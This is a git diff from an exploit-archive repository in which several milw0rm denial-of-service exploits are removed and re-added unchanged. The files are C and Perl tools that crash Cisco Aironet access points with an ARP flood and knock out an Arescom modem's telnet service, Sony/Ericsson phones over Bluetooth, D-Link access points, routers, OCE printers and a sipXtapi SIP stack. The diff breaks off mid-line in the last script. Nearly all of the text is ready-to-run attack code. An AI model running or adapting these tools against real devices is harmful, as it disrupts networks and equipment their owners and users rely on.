-#include -#include -#include -#include - -// Edit this packet accordingly if the target is picky -char pkt[]= -// Ethernet header -"\xff\xff\xff\xff\xff\xff" // Destination: broadcast -"AAAAAA" // Source: 41:41:41:41:41:41 -"\x08\x06" // Pkt type: ARP -// ARP header -"\x00\x01" // Hardware type: Ethernet -"\x08\x00" // Protocol: IP -"\x06" // Hardware size: 6 -"\x04" // Protocol size: 4 -"\x00\x02" // Opcode: Reply -"AAAAAA" // Sender (Mac): 41:41:41:41:41:41 -"AAAA" // Sender (IP): 65.65.65.65 -"AAAAAA" // Target (mac): 41:41:41:41:41:41 -"AAAA" // Target (IP): 65.65.65.65 -; // End of Packet - -int main(int argc, char **argv) { - FILE *fp; - int sock, seed; - long count; - char *device; - in_addr_t addr; - struct sockaddr sin; - - printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n"); - if(getuid()) { - printf("Must be root to inject arp packets!\n"); - exit(1); - } - - if(argc != 2) { - strcpy(device,"wlan0"); - } - else { - device=argv[1]; - } - - fp = fopen("/dev/urandom", "r"); - fscanf(fp,"%d", &seed); - fclose(fp); - srand(seed); - - memset(&sin, 0, sizeof(sin)); - sin.sa_family = AF_UNSPEC; - strncpy(sin.sa_data,device, 14); - - sock = socket(PF_INET, SOCK_PACKET, 0x300); - - printf("Using device: %s\n\n", device); - - // stupid - printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n"); - sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1); - - while(1) { - addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff); - pkt[28] = (char)addr; - pkt[38] = (char)addr; - count++; - printf("#:%ld bytes sent: %d (should be 42)\n",count, sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin))); - } -} - -// milw0rm.com [2006-01-25] +// +// Cisco Killer - ciskill.c +// +// Usage: ./ciskill [device] +// +// Author: Pasv (pasvninja [at] gmail.com) +// +// Credit: This exploit takes advantage of a vulnerability that was +// discovered by Eric Smith on January 12, 2006 (bid:16217) +// +// Greets to NW, zimmy, GSO, and the rest. +// +// Description: The vulnerability exists in the way the affected versions +// below handle ARP replies, if enough specially crafted ARP packets are sent +// on the network with the affected systems it will cause the access point memory +// exhaustion which will in a few seconds (depending on the speed of the attacker +// and the memory of the target) crash the system, making all ingoing/outgoing +// traffic stopped. +// +// Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility +// for your actions (like a knife maker). +// +// Versions affected: +// Cisco Aironet 350 IOS +// Cisco Aironet 1400 +// Cisco Aironet 1300 +// Cisco Aironet 1240AG +// Cisco Aironet 1230AG +// Cisco Aironet 1200 +// Cisco Aironet 1130AG +// Cisco Aironet 1100 +// (this includes most linksys wireless access points) + + + +#include +#include +#include +#include +#include +#include +#include + +// Edit this packet accordingly if the target is picky +char pkt[]= +// Ethernet header +"\xff\xff\xff\xff\xff\xff" // Destination: broadcast +"AAAAAA" // Source: 41:41:41:41:41:41 +"\x08\x06" // Pkt type: ARP +// ARP header +"\x00\x01" // Hardware type: Ethernet +"\x08\x00" // Protocol: IP +"\x06" // Hardware size: 6 +"\x04" // Protocol size: 4 +"\x00\x02" // Opcode: Reply +"AAAAAA" // Sender (Mac): 41:41:41:41:41:41 +"AAAA" // Sender (IP): 65.65.65.65 +"AAAAAA" // Target (mac): 41:41:41:41:41:41 +"AAAA" // Target (IP): 65.65.65.65 +; // End of Packet + +int main(int argc, char **argv) { + FILE *fp; + int sock, seed; + long count; + char *device; + in_addr_t addr; + struct sockaddr sin; + + printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n"); + if(getuid()) { + printf("Must be root to inject arp packets!\n"); + exit(1); + } + + if(argc != 2) { + strcpy(device,"wlan0"); + } + else { + device=argv[1]; + } + + fp = fopen("/dev/urandom", "r"); + fscanf(fp,"%d", &seed); + fclose(fp); + srand(seed); + + memset(&sin, 0, sizeof(sin)); + sin.sa_family = AF_UNSPEC; + strncpy(sin.sa_data,device, 14); + + sock = socket(PF_INET, SOCK_PACKET, 0x300); + + printf("Using device: %s\n\n", device); + + // stupid + printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n"); + sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1); + + while(1) { + addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff); + pkt[28] = (char)addr; + pkt[38] = (char)addr; + count++; + printf("#:%ld bytes sent: %d (should be 42)\n",count, sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin))); + } +} + +// milw0rm.com [2006-01-25] diff --git a/platforms/hardware/dos/1464.c b/platforms/hardware/dos/1464.c index 7d19c4b04..cf798a56e 100755 --- a/platforms/hardware/dos/1464.c +++ b/platforms/hardware/dos/1464.c @@ -1,103 +1,103 @@ -/* - Do you want to hack? les`t go .. free your mind - Tu veux etre un hacker? allez .. if faut libere ta tete! - Quieres hackear? dale .. libera tu mente - - Vulnerabilidad en modem Arescom NetDSL-1000 - por un buffer overflow debido < [255] en la pila stack. - - DoS atack por Fabian Ramirez S. - www.framirez.com - - - If you flood the telnet configuration a couple dozen times with long - strings, eventually the telnetd service flat out dies. Routing functions - of the NetDSL continue to work fine as before. It is unknown whether only - the telnetd service is affected, other means of remote configuration may - have become unavailable as well. - - Remember: KING - - Solo para fines educativos! (CREEEEEEO ZEEEEEEEEEEE) -*/ - -#include -#include -#include -#include -#include -#include - -#define PORT 23 -#define MAXDATASIZE 100 - -char shellcode[]= "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" - "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1"; - -int main(int argc, char *argv[]) -{ - int fd, numbytes,i; - char buf[MAXDATASIZE]; - struct hostent *he; - struct sockaddr_in server; - - printf("Exploit Arescom NetDSL-1000 executing\n"); - printf (" by framirez\n"); - - if (argc !=2) { - printf("Uso: %s \n",argv[0]); - exit(-1); - } - - - - if ((he=gethostbyname(argv[1]))==NULL){ - printf("gethostbyname() error\n"); - exit(-1); - } - - if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){ - printf("socket() error\n"); - exit(-1); - } - - server.sin_family = AF_INET; - server.sin_port = htons(PORT); - server.sin_addr = *((struct in_addr *)he->h_addr); - - if(connect(fd, (struct sockaddr *)&server, - sizeof(struct sockaddr))==-1){ - printf("ERROR conectando al host\n"); - exit(-1); - } - - for (i=0;i<3;i++) - { - send(fd,shellcode,255,0); - } - - printf ("Exploit enviado con EXITO al destinatario\n"); - printf (" by framirez\n"); - - close(fd); - - return 1; -} - -// milw0rm.com [2006-02-02] +/* + Do you want to hack? les`t go .. free your mind + Tu veux etre un hacker? allez .. if faut libere ta tete! + Quieres hackear? dale .. libera tu mente + + Vulnerabilidad en modem Arescom NetDSL-1000 + por un buffer overflow debido < [255] en la pila stack. + + DoS atack por Fabian Ramirez S. + www.framirez.com + + + If you flood the telnet configuration a couple dozen times with long + strings, eventually the telnetd service flat out dies. Routing functions + of the NetDSL continue to work fine as before. It is unknown whether only + the telnetd service is affected, other means of remote configuration may + have become unavailable as well. + + Remember: KING + + Solo para fines educativos! (CREEEEEEO ZEEEEEEEEEEE) +*/ + +#include +#include +#include +#include +#include +#include + +#define PORT 23 +#define MAXDATASIZE 100 + +char shellcode[]= "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1" + "\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1"; + +int main(int argc, char *argv[]) +{ + int fd, numbytes,i; + char buf[MAXDATASIZE]; + struct hostent *he; + struct sockaddr_in server; + + printf("Exploit Arescom NetDSL-1000 executing\n"); + printf (" by framirez\n"); + + if (argc !=2) { + printf("Uso: %s \n",argv[0]); + exit(-1); + } + + + + if ((he=gethostbyname(argv[1]))==NULL){ + printf("gethostbyname() error\n"); + exit(-1); + } + + if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){ + printf("socket() error\n"); + exit(-1); + } + + server.sin_family = AF_INET; + server.sin_port = htons(PORT); + server.sin_addr = *((struct in_addr *)he->h_addr); + + if(connect(fd, (struct sockaddr *)&server, + sizeof(struct sockaddr))==-1){ + printf("ERROR conectando al host\n"); + exit(-1); + } + + for (i=0;i<3;i++) + { + send(fd,shellcode,255,0); + } + + printf ("Exploit enviado con EXITO al destinatario\n"); + printf (" by framirez\n"); + + close(fd); + + return 1; +} + +// milw0rm.com [2006-02-02] diff --git a/platforms/hardware/dos/1473.c b/platforms/hardware/dos/1473.c index 02d202ee1..3b2da98b0 100755 --- a/platforms/hardware/dos/1473.c +++ b/platforms/hardware/dos/1473.c @@ -1,101 +1,101 @@ -/* Sony/Ericsson reset display - PoC */ -/* Pierre BETOUIN - pierre.betouin@infratech.fr */ -/* 05-02-2006 */ -/* Vulnerability found using BSS fuzzer : */ -/* Download www.secuobs.com/news/05022006-bluetooth10.shml */ -/* */ -/* Causes anormal behaviours on some Sony/Ericsson */ -/* cell phones */ -/* Vulnerable tested devices : */ -/* - K600i */ -/* - V600i */ -/* - K750i */ -/* - W800i */ -/* - And maybe other ones... */ -/* */ -/* Vulnerable devices will slowly turn their screen into */ -/* black and then display a white screen. */ -/* After a short period (~45sec), they will go back to */ -/* their normal behaviour */ -/* */ -/* gcc -lbluetooth reset_display_sonyericsson.c */ -/* -o reset_display_sonyericsson */ -/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */ - -#include -#include -#include -#include -#include -#include -#include -#include - -#define SIZE 4 -#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) - -int main(int argc, char **argv) -{ -char *buffer; -l2cap_cmd_hdr *cmd; -struct sockaddr_l2 addr; -int sock, sent, i; - -if(argc < 2) -{ -fprintf(stderr, "%s \n", argv[0]); -exit(EXIT_FAILURE); -} - -if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) -{ -perror("socket"); -exit(EXIT_FAILURE); -} - -memset(&addr, 0, sizeof(addr)); -addr.l2_family = AF_BLUETOOTH; - -if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) -{ -perror("bind"); -exit(EXIT_FAILURE); -} - -str2ba(argv[1], &addr.l2_bdaddr); - -if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) -{ -perror("connect"); -exit(EXIT_FAILURE); -} - -if(!(buffer = (char *) malloc ((int) SIZE + 1))) -{ -perror("malloc"); -exit(EXIT_FAILURE); -} - -memset(buffer, 90, SIZE); - -cmd = (l2cap_cmd_hdr *) buffer; -cmd->code = L2CAP_ECHO_REQ; -cmd->ident = 1; -cmd->len = FAKE_SIZE; - -if( (sent=send(sock, buffer, SIZE, 0)) >= 0) -{ -printf("L2CAP packet sent (%d)\n", sent); -} - -printf("Buffer:\t"); -for(i=0; i +#include +#include +#include +#include +#include +#include +#include + +#define SIZE 4 +#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) + +int main(int argc, char **argv) +{ +char *buffer; +l2cap_cmd_hdr *cmd; +struct sockaddr_l2 addr; +int sock, sent, i; + +if(argc < 2) +{ +fprintf(stderr, "%s \n", argv[0]); +exit(EXIT_FAILURE); +} + +if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) +{ +perror("socket"); +exit(EXIT_FAILURE); +} + +memset(&addr, 0, sizeof(addr)); +addr.l2_family = AF_BLUETOOTH; + +if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) +{ +perror("bind"); +exit(EXIT_FAILURE); +} + +str2ba(argv[1], &addr.l2_bdaddr); + +if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) +{ +perror("connect"); +exit(EXIT_FAILURE); +} + +if(!(buffer = (char *) malloc ((int) SIZE + 1))) +{ +perror("malloc"); +exit(EXIT_FAILURE); +} + +memset(buffer, 90, SIZE); + +cmd = (l2cap_cmd_hdr *) buffer; +cmd->code = L2CAP_ECHO_REQ; +cmd->ident = 1; +cmd->len = FAKE_SIZE; + +if( (sent=send(sock, buffer, SIZE, 0)) >= 0) +{ +printf("L2CAP packet sent (%d)\n", sent); +} + +printf("Buffer:\t"); +for(i=0; i - -#define DEVICE "eth0" -#define SRC_IP "127.0.0.1" -#define DST_IP "127.0.0.1" -#define SRC_PRT 200 -#define DST_PRT 11111 - -void usage (char *name) -{ - fprintf (stderr, - "Usage: %s -s -d \ - -a -b \n", - name); - - exit (EXIT_FAILURE); -} - -int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT, - u_short dPRT, int count) -{ - - libnet_t *l = NULL; - libnet_ptag_t udp = 0; - libnet_ptag_t ip = 0; - - char errbuf[LIBNET_ERRBUF_SIZE]; - char *payload = NULL; - u_short payload_s = 0, src_prt, dst_prt; - u_long src_ip, dst_ip; - int c, frag; - - if (!device) - device = DEVICE; - - l = libnet_init (LIBNET_RAW4, device, errbuf); - - if (!l) { - fprintf (stderr, "libnet_init() failed: %s\n", errbuf); - exit (EXIT_FAILURE); - } - - src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) : - libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE); - - dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) : - libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE); - - src_prt = sPRT ? sPRT : SRC_PRT; - - dst_prt = dPRT ? dPRT : DST_PRT; - - if (count == 1) { - payload = "\0\0\0\0\0\0\0\0"; - payload_s = 8; - } - - udp = libnet_build_udp (src_prt, - dst_prt, - (LIBNET_UDP_H + payload_s) * 2, - 0, (unsigned char *)payload, payload_s, l, udp); - - if (udp == -1) { - fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l)); - exit (EXIT_FAILURE); - } - - switch (count) { - - case 1: - frag = IP_MF; - break; - - case 2: - frag = 0x2002; - break; - - case 3: - frag = 0x0003; - break; - } - - ip = libnet_build_ipv4 (20, - 0, - 1800, - frag, - 128, - IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip); - - if (ip == -1) { - fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l)); - exit (EXIT_FAILURE); - } - - c = libnet_write (l); - - if (c == -1) { - fprintf (stderr, "Write error: %s\n", libnet_geterror (l)); - exit (EXIT_FAILURE); - } - - printf ("Wrote UDP packet; check the wire.\n"); - - libnet_destroy (l); - - return (EXIT_SUCCESS); - -} - -int main (int argc, char **argv) -{ - - int i; - char *pDST, *pSRC, *device; - u_short dPRT = 0; - u_short sPRT = 0; - - pDST = pSRC = device = NULL; - - while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) { - switch (i) { - case 'D': - device = optarg; - break; - case 'd': - pDST = optarg; - break; - case 's': - pSRC = optarg; - break; - case 'a': - sPRT = atoi (optarg); - break; - case 'b': - dPRT = atoi (optarg); - break; - case 'h': - usage (argv[0]); - break; - } - } - - printf ("\n----------------------------------\n"); - printf (" -= D-Link DoS PoC =-\n"); - printf (" Aaron Portnoy\n"); - printf (" deft () thunkers ! net \n"); - printf (" silc.thunkers.net, thunkers\n"); - printf ("----------------------------------\n"); - - - device ? printf ("\nDevice: \t%s\n", device) : - printf ("\nDevice: \t%s\n", DEVICE); - - pSRC ? printf ("SRC IP: \t%s\n", pSRC) : - printf ("SRC IP: \t%s\n", SRC_IP); - - pDST ? printf ("DST IP: \t%s\n", pDST) : - printf ("DST IP: \t%s\n", DST_IP); - - sPRT ? printf ("SPort: \t\t%d\n", sPRT) : - printf ("SPort: \t\t%d\n", SRC_PRT); - - dPRT ? printf ("DPort: \t\t%d\n\n", dPRT) : - printf ("DPort: \t\t%d\n\n", DST_PRT); - - for (i = 1; i <= 3; i++) - gen_packet (device, pSRC, pDST, sPRT, dPRT, i); - printf ("\n"); - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2006-02-14] +/* + * + * Aaron Portnoy + * + * silc.thunkers.net, thunkers + * + * D-Link Wireless Access Point + * Fragmented UDP DoS Proof of Concept + * + * + * gcc -o dlink_dos dlink_dos.c -lnet -Wall + * + */ + +#include + +#define DEVICE "eth0" +#define SRC_IP "127.0.0.1" +#define DST_IP "127.0.0.1" +#define SRC_PRT 200 +#define DST_PRT 11111 + +void usage (char *name) +{ + fprintf (stderr, + "Usage: %s -s -d \ + -a -b \n", + name); + + exit (EXIT_FAILURE); +} + +int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT, + u_short dPRT, int count) +{ + + libnet_t *l = NULL; + libnet_ptag_t udp = 0; + libnet_ptag_t ip = 0; + + char errbuf[LIBNET_ERRBUF_SIZE]; + char *payload = NULL; + u_short payload_s = 0, src_prt, dst_prt; + u_long src_ip, dst_ip; + int c, frag; + + if (!device) + device = DEVICE; + + l = libnet_init (LIBNET_RAW4, device, errbuf); + + if (!l) { + fprintf (stderr, "libnet_init() failed: %s\n", errbuf); + exit (EXIT_FAILURE); + } + + src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) : + libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE); + + dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) : + libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE); + + src_prt = sPRT ? sPRT : SRC_PRT; + + dst_prt = dPRT ? dPRT : DST_PRT; + + if (count == 1) { + payload = "\0\0\0\0\0\0\0\0"; + payload_s = 8; + } + + udp = libnet_build_udp (src_prt, + dst_prt, + (LIBNET_UDP_H + payload_s) * 2, + 0, (unsigned char *)payload, payload_s, l, udp); + + if (udp == -1) { + fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l)); + exit (EXIT_FAILURE); + } + + switch (count) { + + case 1: + frag = IP_MF; + break; + + case 2: + frag = 0x2002; + break; + + case 3: + frag = 0x0003; + break; + } + + ip = libnet_build_ipv4 (20, + 0, + 1800, + frag, + 128, + IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip); + + if (ip == -1) { + fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l)); + exit (EXIT_FAILURE); + } + + c = libnet_write (l); + + if (c == -1) { + fprintf (stderr, "Write error: %s\n", libnet_geterror (l)); + exit (EXIT_FAILURE); + } + + printf ("Wrote UDP packet; check the wire.\n"); + + libnet_destroy (l); + + return (EXIT_SUCCESS); + +} + +int main (int argc, char **argv) +{ + + int i; + char *pDST, *pSRC, *device; + u_short dPRT = 0; + u_short sPRT = 0; + + pDST = pSRC = device = NULL; + + while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) { + switch (i) { + case 'D': + device = optarg; + break; + case 'd': + pDST = optarg; + break; + case 's': + pSRC = optarg; + break; + case 'a': + sPRT = atoi (optarg); + break; + case 'b': + dPRT = atoi (optarg); + break; + case 'h': + usage (argv[0]); + break; + } + } + + printf ("\n----------------------------------\n"); + printf (" -= D-Link DoS PoC =-\n"); + printf (" Aaron Portnoy\n"); + printf (" deft () thunkers ! net \n"); + printf (" silc.thunkers.net, thunkers\n"); + printf ("----------------------------------\n"); + + + device ? printf ("\nDevice: \t%s\n", device) : + printf ("\nDevice: \t%s\n", DEVICE); + + pSRC ? printf ("SRC IP: \t%s\n", pSRC) : + printf ("SRC IP: \t%s\n", SRC_IP); + + pDST ? printf ("DST IP: \t%s\n", pDST) : + printf ("DST IP: \t%s\n", DST_IP); + + sPRT ? printf ("SPort: \t\t%d\n", sPRT) : + printf ("SPort: \t\t%d\n", SRC_PRT); + + dPRT ? printf ("DPort: \t\t%d\n\n", dPRT) : + printf ("DPort: \t\t%d\n\n", DST_PRT); + + for (i = 1; i <= 3; i++) + gen_packet (device, pSRC, pDST, sPRT, dPRT, i); + printf ("\n"); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2006-02-14] diff --git a/platforms/hardware/dos/1551.txt b/platforms/hardware/dos/1551.txt index 027658d8b..8063c3f3c 100755 --- a/platforms/hardware/dos/1551.txt +++ b/platforms/hardware/dos/1551.txt @@ -1,14 +1,14 @@ -It appears that various routers are prone to an IRC-only DoS attack. -Particularly Netgear and Linksys routers have been shown vulnerable. - -If a client behind one of the vulnerable routers connects to an IRC server on port 6667 -(and only 6667, does not DoS with other ports) and a user posts the following string -in either a channel, private message, ctcp, notice, etc.. the router will drop the connection. -The string is as follows: - -DCC SEND anylongrandomstringhere - -Further, it appears the routers that are vulnerable to this are running vxworks as their -embedded OS. Older linux Linksys routers appear to be immune. - -# milw0rm.com [2006-03-04] +It appears that various routers are prone to an IRC-only DoS attack. +Particularly Netgear and Linksys routers have been shown vulnerable. + +If a client behind one of the vulnerable routers connects to an IRC server on port 6667 +(and only 6667, does not DoS with other ports) and a user posts the following string +in either a channel, private message, ctcp, notice, etc.. the router will drop the connection. +The string is as follows: + +DCC SEND anylongrandomstringhere + +Further, it appears the routers that are vulnerable to this are running vxworks as their +embedded OS. Older linux Linksys routers appear to be immune. + +# milw0rm.com [2006-03-04] diff --git a/platforms/hardware/dos/1718.pl b/platforms/hardware/dos/1718.pl index bc96ba1cb..3f535e025 100755 --- a/platforms/hardware/dos/1718.pl +++ b/platforms/hardware/dos/1718.pl @@ -1,69 +1,69 @@ -#!/usr/bin/perl -# -#OCE 3121/3122 Printer DoS Exploit -#---------------------------- -#By Herman Groeneveld aka sh4d0wman -#trancelover75 [AT] gmail.com -# -#Description: the printer runs a webserver to provide various printing tasks from -#java enabled browsers. Input is being filtered for bad characters. -#However it is vulnerable to a long url request. This will either reboot or crash the device. -# -#On crash, the "system" led on the printer changes from green to orange. No further printing is done -#until somebody resets the printer by flipping the powerswitch. E675 error displayed in printer display. -#On reboot, printing resumes after the device has completed it's reboot cycle. -# -#Crash is hard to accomplish. Play with the buffer input size. 261 worked at my printer. -#Values of 250/500/50000 are known to reboot the printer. No reliable size for crashing yet. -# -#Loop this exploit and printing will be nearly impossible. Tested: unhappy users. Not implemented. -# -#If you test this on your device, pls let me know the result. I had just 1 printer to test it at ;) -# -#Discovered: 29/03/2006 -#Target: tested against OCE 3121/3122 printer. -#Vendor: www.oce.com (no response) - - use IO::Socket; - - if (@ARGV != 3) - { - print " \n"; - print " #OCE 3121/3122 Printer DoS Exploit# \n"; - print "---------------------------------------------------------------\n"; - print " Usage: crashoce.pl \n"; - print " Example: new.pl 127.0.0.1 80 250 \n"; - print " Play with request length for reboot or crash effect. \n\n"; - print " #Coded by sh4d0wman 31/03/2006# \n"; - exit(1); - } - - $targetip =$ARGV[0]; #user input, no much fun in attacking 127.0.0.1 is it? - $targetport =$ARGV[1]; #user input since vendor might change this some day, unlikely though :-) - $reqlength = $ARGV[2]; #user input since different sizes give different results - - print "[-] OCE 3122 Printer DoS Exploit\n\n"; - print "[-] Target IP: "; - print $targetip; - print "\n[-] Connecting to target IP...\n"; - -$socket = IO::Socket::INET->new( - Proto => "tcp", - PeerAddr => "$targetip", - PeerPort => "$targetport"); unless ($socket) { die "- Could not connect. Check IP & port. Hint: default port is 80!\n"} - -print "[-] Connected to printer\n\n"; - -print "[-] Creating DoS request...\n"; - -$bufa='A'x$reqlength; #creating payload, length based on user input - -print "[-] Sending request...\n\n"; - -print $socket "GET /parser.exe?".$bufa.".html"." HTTP/1.1\r\n\r\n"; - sleep 5; #Be advised! Printer reaction to exploit can take up to 30 sec. Pls, be patient... - -print "[>]Attack completed! Printer in error state or rebooting.\n"; -close($socket); - -# milw0rm.com [2006-04-26] +#!/usr/bin/perl +# +#OCE 3121/3122 Printer DoS Exploit +#---------------------------- +#By Herman Groeneveld aka sh4d0wman +#trancelover75 [AT] gmail.com +# +#Description: the printer runs a webserver to provide various printing tasks from +#java enabled browsers. Input is being filtered for bad characters. +#However it is vulnerable to a long url request. This will either reboot or crash the device. +# +#On crash, the "system" led on the printer changes from green to orange. No further printing is done +#until somebody resets the printer by flipping the powerswitch. E675 error displayed in printer display. +#On reboot, printing resumes after the device has completed it's reboot cycle. +# +#Crash is hard to accomplish. Play with the buffer input size. 261 worked at my printer. +#Values of 250/500/50000 are known to reboot the printer. No reliable size for crashing yet. +# +#Loop this exploit and printing will be nearly impossible. Tested: unhappy users. Not implemented. +# +#If you test this on your device, pls let me know the result. I had just 1 printer to test it at ;) +# +#Discovered: 29/03/2006 +#Target: tested against OCE 3121/3122 printer. +#Vendor: www.oce.com (no response) + + use IO::Socket; + + if (@ARGV != 3) + { + print " \n"; + print " #OCE 3121/3122 Printer DoS Exploit# \n"; + print "---------------------------------------------------------------\n"; + print " Usage: crashoce.pl \n"; + print " Example: new.pl 127.0.0.1 80 250 \n"; + print " Play with request length for reboot or crash effect. \n\n"; + print " #Coded by sh4d0wman 31/03/2006# \n"; + exit(1); + } + + $targetip =$ARGV[0]; #user input, no much fun in attacking 127.0.0.1 is it? + $targetport =$ARGV[1]; #user input since vendor might change this some day, unlikely though :-) + $reqlength = $ARGV[2]; #user input since different sizes give different results + + print "[-] OCE 3122 Printer DoS Exploit\n\n"; + print "[-] Target IP: "; + print $targetip; + print "\n[-] Connecting to target IP...\n"; + +$socket = IO::Socket::INET->new( + Proto => "tcp", + PeerAddr => "$targetip", + PeerPort => "$targetport"); unless ($socket) { die "- Could not connect. Check IP & port. Hint: default port is 80!\n"} + +print "[-] Connected to printer\n\n"; + +print "[-] Creating DoS request...\n"; + +$bufa='A'x$reqlength; #creating payload, length based on user input + +print "[-] Sending request...\n\n"; + +print $socket "GET /parser.exe?".$bufa.".html"." HTTP/1.1\r\n\r\n"; + sleep 5; #Be advised! Printer reaction to exploit can take up to 30 sec. Pls, be patient... + +print "[>]Attack completed! Printer in error state or rebooting.\n"; +close($socket); + +# milw0rm.com [2006-04-26] diff --git a/platforms/hardware/dos/2000.pl b/platforms/hardware/dos/2000.pl index 8ef99fe8c..4306ab064 100755 --- a/platforms/hardware/dos/2000.pl +++ b/platforms/hardware/dos/2000.pl @@ -1,46 +1,46 @@ -#!/usr/bin/perl -# PoC Exploit By mthumann@ernw.de -# Remote Buffer Overflow in sipXtapi - -use IO::Socket; -#use strict; - - -print "sipXtapi Exploit by Michael Thumann \n\n"; - -if (not $ARGV[0]) { - print "Usage: sipx.pl \n"; -exit;} - -$target=$ARGV[0]; -my $source ="127.0.0.1"; -my $target_port = 5060; -my $user ="bad"; -my $eip="\x41\x41\x41\x41"; -my $cseq = -"\x31\x31\x35\x37\x39\x32\x30\x38". -"\x39\x32\x33\x37\x33\x31\x36\x31". -"\x39\x35\x34\x32\x33\x35\x37\x30". -$eip; -my $packet =<\r -Via: SIP/2.0/UDP $target:3277\r -From: "moz"\r -Call-ID: 3121$target\r -CSeq: $cseq\r -Max-Forwards: 70\r -Contact: \r -\r -END - -print "Sending Packet to: " . $target . "\n\n"; -socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); -my $ipaddr = inet_aton($target); -my $sendto = sockaddr_in($target_port,$ipaddr); -send(PING, $packet, 